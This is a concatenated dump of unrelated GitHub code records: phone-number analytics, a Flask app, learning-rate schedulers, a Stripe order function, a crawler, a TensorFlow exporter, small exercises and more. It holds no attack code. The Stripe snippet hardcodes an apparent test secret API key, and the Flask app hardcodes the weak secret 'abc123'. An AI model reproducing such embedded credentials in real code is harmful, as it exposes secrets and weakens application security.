\"\", phone)\n if type(phone) is list:\n for i in phone:\n i = re.sub(r'\\D', \"\", i)\n if re.search(\"^.812\", i) or re.search(\"^812\", i) or (re.search(\"^.9[0-9][0-9]\", i) and len(i)==11):\n count_phone = count_phone + 1\n elif re.search(\"^.812\", phone) or re.search(\"^812\", phone) or (re.search(\"^.9[0-9][0-9]\", phone) and len(phone)==11):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются пробелы\n def space_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n i = re.sub(\"^[А-Яа-я]+([\\W]+)?[\\s]\", \"\", i)\n\n if re.search(\" \", i):\n count_phone = count_phone + 1\n else:\n phone = re.sub(\"^[А-Яа-я]+([\\W]+)?[\\s]\", \"\", phone)\n if re.search(\" \", phone):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются скобки\n def scop_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n if re.search(\"[()]\", i):\n count_phone = count_phone + 1\n elif re.search(\"[()]\", phone):\n count_phone = count_phone + 1\n return count_phone\n\n # количество телефонных номеров, в записи которых используются дефисы\n def dash_number(self):\n count_phone = 0\n for phone in self.read_csv_colum():\n if isinstance(phone, str):\n if re.search(\",\", phone):\n phone = phone.split(\",\")\n elif re.search(\";\", phone):\n phone = phone.split(\";\")\n elif re.search(\"/\", phone):\n phone = phone.split(\"/\")\n elif re.search(\"[\\s][+]\", phone):\n phone = phone.split(\"+\")\n if type(phone) is list:\n for i in phone:\n i = i.strip()\n if re.search(\"[-]\", i):\n #print(i)\n count_phone = count_phone + 1\n elif re.search(\"[-]\", phone):\n # print(phone)\n count_phone = count_phone + 1\n return count_phone\n\n def view_table(self, namedataset, linkdataset ):\n newdata = datetime.datetime.now().strftime(\"%Y_%m_%d_%H_%M_%S\")\n data = [{'Название набора данных': namedataset, 'Ссылка на набор данных': linkdataset, 'Количество записей в наборе': self.count_csv(),\n \"Название столбца с телефонным номером\":self.colum, 'Количество не пустых телефонных номеров':self.count_not_null_phone(),\n 'Количество городских телефонных номеров':self.count_gor_phone(),'Количество мобильных телефонных номеров':self.count_mobile_phone(),\n 'Количество телеф��нных номеров, с указанием кода страны':self.cont_code_country(),'Количество телефонных номеров с указанием кода города или кода оператора сотовой связи':self.cont_operator_mobile(),\n 'Количество телефонных номеров, в записи которых используются пробелы':self.space_number(), 'Количество телефонных номеров, в записи которых используются скобки':self.scop_number(),\n 'Количество телефонных номеров, в записи которых используются дефисы':self.dash_number(),\n }]\n view = pd.DataFrame(data)\n view.to_csv(f\"{namedataset}_{newdata}.csv\", index=False)\n print(tabulate(view, headers=view.keys(), tablefmt=\"grid\", showindex=\"always\"))\n\n\n\n\n\n\n\nif __name__==\"__main__\":\n for name, link in link_dataset.items():\n dt = Analitic_Phone(link[1], link[2], )\n dt.view_table(name, link[0])\n","repo_name":"veron1213/PK_PPS","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":17338,"program_lang":"python","lang":"ru","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"8427128570","text":"from flask import Flask, render_template\nfrom flask_debugtoolbar import DebugToolbarExtension\nfrom models import Employee, Department, db, connect_db\n\napp = Flask(__name__)\n\napp.config['SQLALCHEMY_DATABASE_URI'] = 'postgresql:///employees'\napp.config['SQLALCHEMY_ECHO'] = True\napp.config['SQLALCHEMY_TRACK_MODIFICATIONS'] = False\napp.config['SECRET_KEY'] = \"abc123\"\n\nconnect_db(app)\n\ntoolbar = DebugToolbarExtension(app)\n\n\n@app.route(\"/phones\")\ndef phone_list():\n \"\"\"Get list of users & dept phones.\n\n This version will be a 'n+1 query' --- it will query once for all\n users, and then for each department.\n\n There's a way to tell SQLAlchemy to load all the data in a single query,\n but don't worry about this for now.\n \"\"\"\n\n emps = Employee.query.all()\n return render_template(\"phones.html\", emps=emps)\n","repo_name":"Zanderfeldt/Springboard-Exercises","sub_path":"23-SQLAlchemy/sqla-associations-demo/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":827,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"60"} +{"seq_id":"19209584752","text":"import numpy as np\n\n\nclass Piecewise_Lr_schedule:\n def __init__(self, opt, milestones, gamma=0.1):\n self.milestones = milestones\n self.gamma = gamma\n self.opt = opt\n self._step = 0\n\n def step(self, epoch=None):\n if epoch is not None:\n self._step = epoch\n else:\n self._step += 1\n\n if self._step in self.milestones:\n lr = self.opt.param_groups[0][\"lr\"]\n lr *= self.gamma\n self.opt.param_groups[0].update(lr=lr)\n\n\nclass Cosine_Lr_schedule:\n def __init__(self, opt, max_lr, max_epoch):\n self.opt = opt\n self.max_lr = max_lr\n self.max_epoch = max_epoch\n self._step = 0\n\n def step(self, epoch=None):\n if epoch is not None:\n self._step = epoch\n else:\n self._step += 1\n\n lr = self.max_lr * 0.5 * (1 + np.cos(self._step / self.max_epoch * np.pi))\n self.opt.param_groups[0].update(lr=lr)\n","repo_name":"theFool32/AT-Framework","sub_path":"utils/lr_scheduler.py","file_name":"lr_scheduler.py","file_ext":"py","file_size_in_byte":972,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"60"} +{"seq_id":"7505007322","text":"from time import sleep\nimport collections\nimport json\n\ndef execute(event, context): \n id = 1\n params = event['queryStringParameters']\n if isinstance(params, collections.Mapping):\n id = params.get('id', 1)\n \n sleep(0.6)\n return {\n \"statusCode\": 200,\n \"headers\": {\n \"Cache-Control\": \"no-cache, no-store, must-revalidate\"\n },\n \"body\": json.dumps({'id': id})\n }","repo_name":"edjus/arquitectura_software_tp2","sub_path":"python-lambda/lambda.py","file_name":"lambda.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"30430196076","text":"import stripe\n\nstripe.api_key = \"sk_test_fc0heHRqHr9mMCIU6wPs6MoL\"\n\n\ndef create_order(data):\n if not data['token']:\n return 'Error: no token supplied.'\n\n customer = stripe.Customer.create(source=data['token'])\n\n cus_info = customer['sources']['data'][0]\n shipping = {\n \"name\": cus_info['name'],\n \"address\": {\n \"line1\": cus_info['address_line1'],\n \"city\": cus_info['address_city'],\n \"country\": cus_info['address_country'],\n \"postal_code\": cus_info['address_zip']\n },\n }\n\n items_list = [{'type': 'sku', 'parent': item['uid'], 'quantity': item['quantity']} for item in data['items']]\n\n stripe.Order.create(\n currency='usd',\n items=items_list,\n customer=customer.id,\n shipping=shipping,\n email=data['email']\n )\n\n return 'ok'\n","repo_name":"cwackerfuss/stickerstack","sub_path":"server/tasks/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"17631638830","text":"import BasicTree as bt #import the basic tree library\n\n#The main depth-first search function, it calls a helper function with the correct parameters\n#tree ----- the BasicTree tree variable setup beforehand, this is what will be searched (could also be called the state space)\n#val ----- the value to search for\n#This will return a string which is the path needed to take to get to val\ndef DFS(tree, val):\n return DFSRecursive(tree.root, tree.layers, val)\n\n#This is what's known as a recursive helper function, it will do the heavy lifting of the algorithm\ndef DFSRecursive(node, numLayers, val):\n #remember, every bit of code here will be run for every node called, not just the root one\n \n if (node.data == val): #if we have reached a node with data equal to the val...\n return str(node.data) #return the data as a string\n elif (numLayers <= 0): #if we have exhausted all layers...\n return None #return None type, this means the val wasn't found\n else: #otherwise...\n cutoff = False #initialize a cutoff variable, this will be used to flag if all children are leaf nodes and don't contain our desired val\n for n in node.children: #for every child...\n result = DFSRecursive(n, numLayers-1, val) #the result for every child should be the result of it's children (this is where the recursion happens)\n if (result == None): #if the result is None, we have reached the end layer\n cutoff = True #flag with the cutoff variable\n else: #otherwise we have found a matching node!\n return str(node.data) + '->' + result #return the current node's data val with the result (this node must lead to the solution)\n if (cutoff): #if we hit a cutoff...\n return None #return None\n \ntree = bt.Tree() #create the tree\ntree.createTree(4) #populate the tree with 4 layers of random nodes\ntree.printTree() #print to console\nprint()\nprint(\"Path to 'A': \" + str(DFS(tree, 'A')))\nprint(\"Path to 'F': \" + str(DFS(tree, 'F')))\nprint(\"Path to 'X': \" + str(DFS(tree, 'X')))\nprint(\"Path to 'Z': \" + str(DFS(tree, 'Z')))\n","repo_name":"And1210/IntroToAICourseCode","sub_path":"Week 1 MOD 2/depthFirstSearch.py","file_name":"depthFirstSearch.py","file_ext":"py","file_size_in_byte":2123,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"22462625891","text":"import os\nimport shutil\nimport time\nimport unittest\nimport uuid\n\nimport torch\nfrom mmcv.parallel import MMDataParallel\nfrom tests.ut_config import TMP_DIR_LOCAL\n\nfrom easycv.datasets import build_dataloader\nfrom easycv.file import io\nfrom easycv.hooks.dino_hook import DINOHook\nfrom easycv.runner import EVRunner\nfrom easycv.utils.logger import get_root_logger\n\n\nclass DummyDataset(object):\n\n def __getitem__(self, idx):\n output = {'img': [torch.randn(3, 224, 224), torch.randn(3, 224, 224)]}\n return output\n\n def __len__(self):\n return 4\n\n\ndef _build_model():\n from easycv.models import build_model\n model = dict(\n type='DINO',\n pretrained=None,\n train_preprocess=[\n 'randomGrayScale', 'gaussianBlur', 'solarize'\n ], # 2+6 view, has different augment pipeline, dino is complex\n backbone=dict(\n type='PytorchImageModelWrapper',\n # deit(224)\n model_name='dynamic_deit_small_p16',\n ),\n # swav need mulit crop ,doesn't support vit based model\n neck=dict(type='DINONeck', in_dim=384, out_dim=65536),\n config=dict(\n use_bn_in_head=False,\n norm_last_layer=True,\n ))\n\n return build_model(model)\n\n\nclass DINOHookTest(unittest.TestCase):\n\n def setUp(self):\n print(('Testing %s.%s' % (type(self).__name__, self._testMethodName)))\n\n def test_byol_hook(self):\n work_dir = os.path.join(TMP_DIR_LOCAL, uuid.uuid4().hex)\n io.makedirs(work_dir)\n timestamp = time.strftime('%Y%m%d_%H%M%S', time.localtime())\n log_file = os.path.join(work_dir, '{}.log'.format(timestamp))\n logger = get_root_logger(log_file=log_file)\n\n model = _build_model()\n model = MMDataParallel(model, device_ids=[0]).cuda()\n optimizer = torch.optim.SGD(model.parameters(), lr=0.02, momentum=0.95)\n runner = EVRunner(\n model=model, work_dir=work_dir, optimizer=optimizer, logger=logger)\n\n dino_hook = DINOHook()\n runner.register_hook(dino_hook)\n\n dataset = DummyDataset()\n dataloader = build_dataloader(\n dataset, imgs_per_gpu=2, workers_per_gpu=1)\n runner.data_loader = [dataloader]\n runner.run([dataloader], [('train', 1)], 1)\n self.assertEqual(runner.optimizer.param_groups[0]['weight_decay'],\n 0.22)\n\n shutil.rmtree(work_dir, ignore_errors=True)\n\n\nif __name__ == '__main__':\n unittest.main()\n","repo_name":"alibaba/EasyCV","sub_path":"tests/test_hooks/test_dino_hook.py","file_name":"test_dino_hook.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","stars":1565,"dataset":"github-code","pt":"60"} +{"seq_id":"25236177369","text":"force = {}\n\nwhile True:\n input_line = input()\n if input_line == \"Lumpawaroo\":\n break\n else:\n if \"|\" in input_line:\n split_input = input_line.split(\" | \")\n force_side = split_input[0]\n force_user = split_input[1]\n is_found = False\n for key, value in force.items():\n if force_user in value:\n is_found = True\n if not is_found:\n if force_side not in force:\n force[force_side] = [force_user]\n else:\n if force_user not in force[force_side]:\n force[force_side].append(force_user)\n\n elif \"->\" in input_line:\n split_input = input_line.split(\" -> \")\n force_side = split_input[1]\n force_user = split_input[0]\n\n for key, value in force.items():\n if force_user in value:\n force[key].pop(value.index(force_user))\n\n if force_side not in force:\n force[force_side] = [force_user]\n else:\n force[force_side].append(force_user)\n\n print(f\"{force_user} joins the {force_side} side!\")\n\nsorted_force = sorted(force.items(), key=lambda x: (-len(x[1]), x[0]))\n\nfor side in sorted_force:\n if len(side[1]) > 0:\n print(f\"Side: {side[0]}, Members: {len(side[1])}\")\n for u in sorted(side[1]):\n print(f\"! {u}\")","repo_name":"ivelinakaraivanova/SoftUniPythonFundamentals","sub_path":"src/Dictionaries_Exercise/09_ForceBook.py","file_name":"09_ForceBook.py","file_ext":"py","file_size_in_byte":1468,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"60"} +{"seq_id":"42627713332","text":"import re\nimport time\nfrom logging import *\n\nfrom src.Graph import Graph\nfrom src.Saver import Saver\nfrom src.Queue import Queue\nfrom src.Processor import Processor\nfrom src.Downloader import Downloader\nfrom src.Database import Database\n\n\nclass Crawler:\n def __init__(self,\n queue: Queue,\n processor: Processor,\n downloader: Downloader,\n graph: Graph,\n saver: Saver,\n db: Database,\n host: str):\n self.__graph = graph\n self.__downloader = downloader\n self.__queue = queue\n self.__proc = processor\n self.__saver = saver\n self.__db = db\n self.__host = host\n\n def start(self):\n log(INFO, 'Started')\n while True:\n try:\n for url in self.__queue.get_consumer():\n log(INFO, url)\n print(1)\n page = self.__downloader.load(url, self.__host)\n\n body, links, true_url = self.__proc.parse(page)\n old_url = None\n if true_url is not None:\n old_url = url\n url = true_url\n\n links = set(filter(Crawler.is_internal, links))\n if url in links:\n links.remove(url)\n unwatched_links = self.__db.new_set(links)\n\n for l in unwatched_links:\n self.__queue.push(l)\n\n if self.article_url(url):\n key = Crawler.get_key(url)\n path = self.__saver.save(key, body)\n self.__db.save_path(key, path)\n self.__graph.add(key, map(Crawler.get_key, filter(self.article_url, links)))\n if old_url is not None:\n self.__graph.add(old_url, [url])\n\n self.__db.add(unwatched_links)\n self.__queue.ack()\n self.__db.commit()\n except Exception as e:\n log(ERROR, 'Exception: ', e, 'url: ' + url, 'unwatched_links: ' + str(unwatched_links))\n self.__db.rollback()\n time.sleep(30)\n\n PATH_PREFIX = '/wiki'\n\n @staticmethod\n def is_internal(path: str):\n return path.startswith(Crawler.PATH_PREFIX)\n\n @staticmethod\n def get_key(path: str):\n return path[len(f'{Crawler.PATH_PREFIX}/'):]\n\n @staticmethod\n def article_url(link: str):\n return link.startswith(Crawler.PATH_PREFIX) \\\n and re.search(r':(?!_)', link) is None \\\n and link != f'{Crawler.PATH_PREFIX}/Main_Page'\n","repo_name":"pashatyl/crawler","sub_path":"src/Crawler.py","file_name":"Crawler.py","file_ext":"py","file_size_in_byte":2736,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"6"} +{"seq_id":"10701378348","text":"#coding=utf-8\nfrom __future__ import print_function, unicode_literals\nimport tensorflow as tf\nimport os\n\n\ntf.flags.DEFINE_string(\"last_checkpoint\", \"./runs/1505182128/checkpoints\", \"上次暂存点位置\")\nFLAGS = tf.flags.FLAGS\n\n\nexport_path = \"mnist_models\"\nmodel_version = '1'\nexport_path = os.path.join(export_path, model_version)\n\nprint('Exporting trained model to', export_path)\n\nsess = tf.InteractiveSession()\n\ngraph = tf.Graph()\nwith graph.as_default():\n sess = tf.InteractiveSession()\n with sess.as_default():\n checkpoint_file = tf.train.latest_checkpoint(FLAGS.last_checkpoint)\n saver = tf.train.import_meta_graph(\"{}.meta\".format(checkpoint_file))\n saver.restore(sess, checkpoint_file)\n\n table = tf.contrib.lookup.index_to_string_table_from_tensor(\n tf.constant([str(i) for i in range(10)]))\n\n\n # 模型构建器\n builder = tf.saved_model.builder.SavedModelBuilder(export_path)\n\n # 计算图中部分节点\n x = graph.get_operation_by_name('inputs').outputs[0]\n y = graph.get_operation_by_name('y').outputs[0]\n\n tensor_info_x = tf.saved_model.utils.build_tensor_info(x) # 输入\n tensor_info_y = tf.saved_model.utils.build_tensor_info(y) # 前向传播结果\n\n classification_inputs = tf.saved_model.utils.build_tensor_info(x)\n classification_outputs_classes = tf.saved_model.utils.build_tensor_info(graph.get_operation_by_name('prediction_classes').outputs[0]) # 预测分类\n classification_outputs_scores = tf.saved_model.utils.build_tensor_info(graph.get_operation_by_name('classification_outputs_scores').outputs[0]) # 预测分类的得分\n\n # 分类签名\n classification_signature = (\n tf.saved_model.signature_def_utils.build_signature_def(\n inputs={\n tf.saved_model.signature_constants.CLASSIFY_INPUTS: classification_inputs\n },\n outputs={\n tf.saved_model.signature_constants.CLASSIFY_OUTPUT_CLASSES:\n classification_outputs_classes,\n tf.saved_model.signature_constants.CLASSIFY_OUTPUT_SCORES:\n classification_outputs_scores\n },\n method_name=tf.saved_model.signature_constants.CLASSIFY_METHOD_NAME))\n\n # 预言签名\n prediction_signature = (\n tf.saved_model.signature_def_utils.build_signature_def(\n inputs={'images': tensor_info_x},\n outputs={'scores': tensor_info_y},\n method_name=tf.saved_model.signature_constants.PREDICT_METHOD_NAME))\n\n legacy_init_op = tf.group(tf.tables_initializer(), name='legacy_init_op')\n\n builder.add_meta_graph_and_variables(\n sess, [tf.saved_model.tag_constants.SERVING], # 通用标记\n signature_def_map={\n 'predict_images':\n prediction_signature,\n tf.saved_model.signature_constants.DEFAULT_SERVING_SIGNATURE_DEF_KEY:\n classification_signature,\n },\n legacy_init_op=legacy_init_op)\n\n builder.save()\n print(\"导出成功\")","repo_name":"mikuh/tf_code","sub_path":"example_mnist/export_model.py","file_name":"export_model.py","file_ext":"py","file_size_in_byte":3212,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"6"} +{"seq_id":"73813967549","text":"# 시간초과\n\nfrom collections import deque\nimport sys\ninput = sys.stdin.readline\n\nn = int(input())\n\ngraph = [0]\n\nfor _ in range(n):\n graph += list(map(int, input().split()))\n\nstart = 1\n\nq = deque([start])\nreached = False\nwhile q:\n now = q.popleft()\n if now == n*n:\n reached = True\n break\n else:\n jump = graph[now]\n if now % n != 0:\n if now % n + 1 * jump <= n:\n q.append(now + 1 * jump)\n \n if now + n * jump <= n*n:\n q.append(now + n * jump)\n\n \nif reached:\n print(\"HaruHaru\")\nelse:\n print(\"Hing\")","repo_name":"hyena0608/AlgorithmStudy","sub_path":"백준/파이썬/16173_mycode.py","file_name":"16173_mycode.py","file_ext":"py","file_size_in_byte":543,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"35924849340","text":"from enum import Enum\r\nfrom types import NoneType\r\nimport logging\r\nfrom blatann.nrf.nrf_dll_load import driver\r\nimport blatann.nrf.nrf_driver_types as util\r\n\r\nlogger = logging.getLogger(__name__)\r\n\r\nBLE_CONN_HANDLE_INVALID = driver.BLE_CONN_HANDLE_INVALID\r\n\r\n\r\nclass BLEUUIDBase(object):\r\n BLE_UUID_TYPE_BLE = driver.BLE_UUID_TYPE_BLE\r\n\r\n def __init__(self, vs_uuid_base=None, uuid_type=None):\r\n assert isinstance(vs_uuid_base, (list, NoneType)), 'Invalid argument type'\r\n assert isinstance(uuid_type, (int, long, NoneType)), 'Invalid argument type'\r\n if vs_uuid_base is None:\r\n self.base = [0x00, 0x00, 0x00, 0x00, 0x00, 0x00, 0x10, 0x00,\r\n 0x80, 0x00, 0x00, 0x80, 0x5F, 0x9B, 0x34, 0xFB]\r\n self.def_base = True\r\n else:\r\n self.base = vs_uuid_base\r\n self.def_base = False\r\n\r\n if uuid_type is None and self.def_base:\r\n self.type = driver.BLE_UUID_TYPE_BLE\r\n else:\r\n self.type = uuid_type if uuid_type is not None else 0\r\n\r\n def __eq__(self, other):\r\n if not isinstance(other, BLEUUIDBase):\r\n return False\r\n if self.base != other.base:\r\n return False\r\n if self.type != other.type:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n @classmethod\r\n def from_c(cls, uuid):\r\n if uuid.type == driver.BLE_UUID_TYPE_BLE:\r\n return cls(uuid_type=uuid.type)\r\n else:\r\n return cls([0] * 16, uuid_type=uuid.type) # TODO: Hmmmm? [] or [None]*16? what?\r\n\r\n @classmethod\r\n def from_uuid128_array(cls, uuid128_array):\r\n msb_list = uuid128_array[::-1]\r\n return cls(msb_list)\r\n\r\n def to_c(self):\r\n lsb_list = self.base[::-1]\r\n self.__array = util.list_to_uint8_array(lsb_list)\r\n uuid = driver.ble_uuid128_t()\r\n uuid.uuid128 = self.__array.cast()\r\n return uuid\r\n\r\n\r\nclass BLEUUID(object):\r\n class Standard(Enum):\r\n unknown = 0x0000\r\n service_primary = 0x2800\r\n service_secondary = 0x2801\r\n characteristic = 0x2803\r\n cccd = 0x2902\r\n battery_level = 0x2A19\r\n heart_rate = 0x2A37\r\n\r\n def __init__(self, value, base=BLEUUIDBase()):\r\n assert isinstance(base, BLEUUIDBase), 'Invalid argument type'\r\n self.base = base\r\n if self.base.def_base:\r\n try:\r\n self.value = value if isinstance(value, BLEUUID.Standard) else BLEUUID.Standard(value)\r\n except ValueError:\r\n self.value = value\r\n else:\r\n self.value = value\r\n\r\n def get_value(self):\r\n if isinstance(self.value, BLEUUID.Standard):\r\n return self.value.value\r\n return self.value\r\n\r\n def as_array(self):\r\n base_and_value = self.base.base[:]\r\n base_and_value[2] = (self.get_value() >> 8) & 0xff\r\n base_and_value[3] = (self.get_value() >> 0) & 0xff\r\n return base_and_value\r\n\r\n def __str__(self):\r\n if isinstance(self.value, BLEUUID.Standard):\r\n return '0x{:04X} ({})'.format(self.value.value, self.value)\r\n elif self.base.type == driver.BLE_UUID_TYPE_BLE and self.base.def_base:\r\n return '0x{:04X}'.format(self.value)\r\n else:\r\n base_and_value = self.base.base[:]\r\n base_and_value[2] = (self.value >> 8) & 0xff\r\n base_and_value[3] = (self.value >> 0) & 0xff\r\n return '0x{}'.format(''.join(['{:02X}'.format(i) for i in base_and_value]))\r\n\r\n def __repr__(self):\r\n return self.__str__()\r\n\r\n def __eq__(self, other):\r\n if isinstance(other, BLEUUID.Standard):\r\n return self.get_value() == other.value\r\n if not isinstance(other, BLEUUID):\r\n return False\r\n if not self.base == other.base:\r\n return False\r\n if not self.value == other.value:\r\n return False\r\n return True\r\n\r\n def __ne__(self, other):\r\n return not self.__eq__(other)\r\n\r\n def __hash__(self):\r\n return hash(str(self))\r\n\r\n @classmethod\r\n def from_c(cls, uuid):\r\n return cls(value=uuid.uuid, base=BLEUUIDBase.from_c(uuid)) # TODO: Is this correct?\r\n\r\n @classmethod\r\n def from_uuid128(cls, uuid128):\r\n uuid = util.uint8_array_to_list(uuid128.uuid, 16)\r\n return cls.from_array(uuid)\r\n\r\n def to_c(self):\r\n assert self.base.type is not None, 'Vendor specific UUID not registered'\r\n uuid = driver.ble_uuid_t()\r\n if isinstance(self.value, BLEUUID.Standard):\r\n uuid.uuid = self.value.value\r\n else:\r\n uuid.uuid = self.value\r\n uuid.type = self.base.type\r\n return uuid\r\n\r\n @classmethod\r\n def from_array(cls, uuid_array_lt):\r\n base = list(reversed(uuid_array_lt))\r\n uuid = (base[2] << 8) + base[3]\r\n base[2] = 0\r\n base[3] = 0\r\n return cls(value=uuid, base=BLEUUIDBase(base, 0))\r\n\r\n\r\nclass BLEEnableParams(object):\r\n def __init__(self,\r\n vs_uuid_count,\r\n service_changed,\r\n periph_conn_count,\r\n central_conn_count,\r\n central_sec_count,\r\n attr_tab_size=driver.BLE_GATTS_ATTR_TAB_SIZE_DEFAULT,\r\n att_mtu_max=driver.GATT_MTU_SIZE_DEFAULT):\r\n self.vs_uuid_count = vs_uuid_count\r\n self.attr_tab_size = attr_tab_size\r\n self.service_changed = service_changed\r\n self.periph_conn_count = periph_conn_count\r\n self.central_conn_count = central_conn_count\r\n self.central_sec_count = central_sec_count\r\n self.att_mtu_max = att_mtu_max\r\n\r\n def to_c(self):\r\n ble_enable_params = driver.ble_enable_params_t()\r\n ble_enable_params.common_enable_params.p_conn_bw_counts = None\r\n ble_enable_params.common_enable_params.vs_uuid_count = self.vs_uuid_count\r\n ble_enable_params.gatt_enable_params.att_mtu = self.att_mtu_max\r\n ble_enable_params.gatts_enable_params.attr_tab_size = self.attr_tab_size\r\n ble_enable_params.gatts_enable_params.service_changed = self.service_changed\r\n ble_enable_params.gap_enable_params.periph_conn_count = self.periph_conn_count\r\n ble_enable_params.gap_enable_params.central_conn_count = self.central_conn_count\r\n ble_enable_params.gap_enable_params.central_sec_count = self.central_sec_count\r\n\r\n return ble_enable_params\r\n","repo_name":"QuestionMarque/blatann","sub_path":"blatann/nrf/nrf_types/generic.py","file_name":"generic.py","file_ext":"py","file_size_in_byte":6527,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"6"} +{"seq_id":"20429354511","text":"\r\n# coding: utf-8\r\n\r\n# # Bedingte Wahrscheinlichkeit - Lösung\r\n\r\n# Zuerst wird der Code angepasst, sodass die Personen mit einer festen Wahrscheinlichkeit einem Alter zugeordnet werden (hier: 40%):\r\n\r\n# In[14]:\r\n\r\n\r\nfrom numpy import random\r\nrandom.seed(0)\r\n\r\ntotals = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\npurchases = {20:0, 30:0, 40:0, 50:0, 60:0, 70:0}\r\ntotalPurchases = 0\r\nfor _ in range(100000):\r\n ageDecade = random.choice([20, 30, 40, 50, 60, 70])\r\n purchaseProbability = 0.4\r\n totals[ageDecade] += 1\r\n if (random.random() < purchaseProbability):\r\n totalPurchases += 1\r\n purchases[ageDecade] += 1\r\n\r\n\r\n# Als nächstes wird P(E|F) für eine Altersgruppe berechnet:\r\n\r\n# In[15]:\r\n\r\n\r\nPEF = purchases[30] / totals[30]\r\nprint(\"P(purchase | 30s): \" + str(PEF))\r\n\r\n\r\n# Berechnen von P(E):\r\n\r\n# In[16]:\r\n\r\n\r\nPE = totalPurchases / 100000.0\r\nprint(\"P(Purchase):\" + str(PE))\r\n\r\n\r\n# P(E|F) sehr Nah an P(E), sodass P und E höchst Wahrscheinlich voneinander unabhängige Variablen sind.\r\n","repo_name":"h3pdesign/New-Coding-Mac","sub_path":"Coding Projects/Python Machine Learning/Materialien/Bedingte Wahrscheinlichkeit - Loesung.py","file_name":"Bedingte Wahrscheinlichkeit - Loesung.py","file_ext":"py","file_size_in_byte":1011,"program_lang":"python","lang":"de","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"31165757786","text":"#This is a program exploring what is called \"The simplest impossible math problem\" called Collatz sequence.\n# You can read more about it here: https://en.wikipedia.org/wiki/Collatz_conjecture\n#This is from chapter 3 (Practice project)\n\ndef collatz(num):\n if num%2 == 0:\n return num//2\n else:\n return 3*num+1\n\nif __name__ == '__main__':\n num = input('Input an integer: ')\n num = int(num)\n i = 0\n while num != 1:\n num = collatz(num)\n print(num)\n i += 1\n print('Sequence length: ',i)\n\n","repo_name":"nicolabc/Automate-The-Boring-Stuff","sub_path":"Chapter 01~06 - Fundamentals/Collatz conjecture.py","file_name":"Collatz conjecture.py","file_ext":"py","file_size_in_byte":538,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"75189170108","text":"import threading\n\nclass I_MEM(threading.Thread):\n #constructor\n def __init__(self, PC, CLK):\n self.PC = PC\n self.MyCLK = CLK\n threading.Thread.__init__(self,target = self.setDO, args = ())\n #self.DO = \"\";\n self.DO = self.getInstruction();\n\n def setDO(self):\n while True:\n #print(\"en loop de IMEM\")\n if(self.MyCLK.running):\n self.DO = self.getInstruction()\n\n def getInstruction(self):\n f = open(\"instrucciones.txt\", \"r\")\n linea = 0;\n for x in f:\n if(self.PC.getCount() == linea):\n return x[:-1]\n linea = linea+1\n f.close()\n\n\n","repo_name":"ger534/Proyecto2Arqui2","sub_path":"procesador/I_MEM.py","file_name":"I_MEM.py","file_ext":"py","file_size_in_byte":680,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"43710486706","text":"import RPi.GPIO as gpio\nfrom utils.DefaultLogger import Log\nfrom constants import *\nfrom utils.Execution import IntervalExecution\n\n\nclass TimedBuzzer:\n _INPUT_PIN = 27\n _DURATION_SECONDS = 2\n\n def __init__(self, device_id, device_manager, device_config):\n self._device_id = device_id\n self._device_manager = device_manager\n self._device_config = device_config\n gpio.setup(TimedBuzzer._INPUT_PIN, gpio.OUT)\n self._timer = IntervalExecution(self.off, TimedBuzzer._DURATION_SECONDS, tag=\"TimedBuzzer\", start=True)\n\n def cleanup(self):\n self._timer.quit()\n gpio.output(TimedBuzzer._INPUT_PIN, False)\n\n def off(self):\n Log.info(\"buzzer off\")\n gpio.output(TimedBuzzer._INPUT_PIN, False)\n\n def on(self):\n Log.info(\"buzzer on\")\n gpio.output(TimedBuzzer._INPUT_PIN, True)\n self._timer.reset()\n\nbuzzer_config = {\n \"off\": TimedBuzzer.off,\n \"on\": TimedBuzzer.on,\n\n # mandatory\n DEVICE_OBJECT: None,\n CONSTRUCTOR: TimedBuzzer,\n CLEANUP: TimedBuzzer.cleanup\n}\n","repo_name":"JCalabig/Home","sub_path":"devices/TimedBuzzer.py","file_name":"TimedBuzzer.py","file_ext":"py","file_size_in_byte":1066,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"6"} +{"seq_id":"10424241031","text":"#-*- coding: utf-8 